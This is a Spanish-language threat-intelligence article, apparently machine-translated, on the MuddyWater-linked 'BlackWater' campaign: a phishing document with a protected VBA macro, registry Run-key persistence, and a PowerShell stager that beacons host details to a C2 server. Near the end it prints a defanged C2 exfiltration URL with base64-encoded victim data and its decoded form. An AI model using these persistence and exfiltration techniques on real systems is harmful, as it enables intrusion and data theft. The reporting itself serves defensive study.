BlackWater de MuddyWater APT install Backdoor

apt

Los investigadores descubrieron una campaña de malware Blackwater que se sospechaba que estaba asociada con el conocido APT de MuddyWater, que evitaba el control de seguridad e instalaba una puerta trasera en el PC de las víctimas utilizando las tácticas, técnicas y procedimientos (TTP) de MuddyWater

MuddyWater se involucró en varios ataques cibernéticos en el pasado reciente y se enfocó en organizaciones de Pakistán, Turquía y Tayikistán que utilizan múltiples métodos de ingeniería social para engañar a las víctimas para que habiliten macros y activen la carga útil.

La campaña de Blackwater se considera un nuevo arsenal de MuddyWater APT ya que las actividades indican que los actores de amenazas aplicaron muchas tácticas para mejorar su seguridad operativa y evitar la detección de puntos finales.

Los actores de amenazas que utilizan el script VBA ofuscado para establecer el mecanismo de persistencia y el script VBA activaron un stager de PowerShell, también es un tipo de método para disfrazarse como una herramienta de equipo rojo.

Backwater también empleó un script de agente FruityC2 , un marco de código abierto en GitHub al permitir que PowerShell Stager se comunique con el servidor C2 para enumerar más la máquina host.

Es uno de los métodos de amenaza empleados por los actores para hacer más difícil la detección basada en host y evitar la detección basada en firmas de las reglas de Yara.

Proceso de infección de BlackWater

Los investigadores descubrieron un documento con armas que se envía a las víctimas a través de correos electrónicos de phishing con la marca de tiempo que indica que el documento se creó el 23 de abril.

Una vez que las víctimas abren el documento malicioso, es necesario que el usuario habilite la Macro titulada "BlackWater.bas"

Los actores de amenazas también emplearon una técnica anti-reversa protegiendo a Macro con una contraseña a inaccesible si un usuario intentaba ver la Macro en Visual Basic.

Según Talos Research, "La macro contiene un script de PowerShell para persistir en la clave de registro" Ejecutar ", " KCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ SystemTextEncoding ".

La secuencia de comandos luego llamó al archivo "\ ProgramData \ SysTextEnc.ini" cada 300 segundos. La versión de texto claro de la SysTextEnc.ini parece ser un stager ligero ".

Este agente de PowerShell fue utilizado previamente por los actores de MuddyWater cuando se dirigieron a grupos políticos y organizaciones kurdas en Turquía.

En la campaña de Blackwater, los actores de amenazas han hecho algunos pequeños cambios, como alterar los nombres de las variables para evitar la detección de Yara y enviar los resultados de los comandos al C2 en la URL en lugar de escribirlos en el archivo.

Finalmente, el script de PowerShell enumerará la máquina de víctimas seleccionadas para consultar la siguiente información.

  • Nombre del sistema operativo (es decir, el nombre de la máquina)
  • Arquitectura del sistema operativo del sistema operativo
  • Leyenda del sistema operativo
  • Dominio del sistema informatico
  • Nombre de usuario del sistema informático
  • Dirección IP pública de la computadora

Una vez que se enumera toda la información, propone la solicitud de envío de URL a un C2 con codificación base64, mientras que en versiones anteriores esta información se escribía en un archivo de texto.

hxxp: [.] [.] [.]? // 82 102 8 101 / bcerrxy.php Rihl = RkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYqMTk5NypFUDEq0D0uTWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwqMzItYml0KlVTRVItUEMqV09SS0dST1VQ0D0uKlVTRVItUENcYWRtaW4qMTkyLjE2OC4wMDAuMDE =

Luego, decodifica los datos enumerados y obtiene los datos robados de las víctimas.

hxxp: // 82 [.] 102 [.] 8 [.] 101 / bcerrxy.php? riHi = FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF- FF-FF-FF * 1997 * EP1 * Ð = .Microsoft Windows 7 Professional * 32 bits * USER-PC * WORKGROUPÐ =. * USER-PC \ admin * 192.168.000.01

Fecha actualización el 2021-05-23. Fecha publicación el 2019-05-23. Categoría: apt Autor: Oscar olg Mapa del sitio Fuente: gwhachers Version movil